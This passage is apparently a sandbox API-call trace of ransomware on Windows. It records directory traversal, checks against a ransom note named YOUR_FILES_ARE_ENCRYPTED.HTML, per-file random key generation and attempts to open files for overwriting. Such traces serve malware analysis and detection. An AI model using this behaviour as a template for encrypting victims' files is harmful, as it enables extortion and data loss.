4 [0169.898] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0169.898] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.898] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0169.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\mf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.899] GetProcessHeap () returned 0x270000 [0169.899] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.899] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0169.899] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned 45 [0169.899] GetProcessHeap () returned 0x270000 [0169.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.900] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" [0169.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*" [0169.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.900] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.900] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0169.900] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned 61 [0169.900] GetProcessHeap () returned 0x270000 [0169.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.900] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0169.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*" [0169.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.900] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.901] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.901] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0169.901] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.901] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.901] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.901] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0169.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.901] GetProcessHeap () returned 0x270000 [0169.902] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.902] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.902] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.902] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.902] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.902] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.902] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.902] GetProcessHeap () returned 0x270000 [0169.903] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.903] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Network", cAlternateFileName="")) returned 1 [0169.903] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned 40 [0169.903] GetProcessHeap () returned 0x270000 [0169.903] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.903] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" [0169.903] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*" [0169.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.903] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.904] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0169.904] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 52 [0169.904] GetProcessHeap () returned 0x270000 [0169.904] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.904] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" [0169.904] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*" [0169.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.904] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.904] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.904] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.904] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.904] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.904] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.904] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.905] GetProcessHeap () returned 0x270000 [0169.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.905] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0169.905] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned 51 [0169.905] GetProcessHeap () returned 0x270000 [0169.905] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.905] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader" [0169.906] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*" [0169.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.906] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.906] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5c9fd775, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5c9fd775, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0169.906] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 61 [0169.906] lstrcmpW (lpString1="qmgr0.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.906] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0169.906] lstrlenW (lpString=".dat") returned 4 [0169.906] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0169.906] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.906] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ca238d5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0169.906] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 61 [0169.906] lstrcmpW (lpString1="qmgr1.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.907] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0169.907] lstrlenW (lpString=".dat") returned 4 [0169.907] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0169.907] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.907] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, 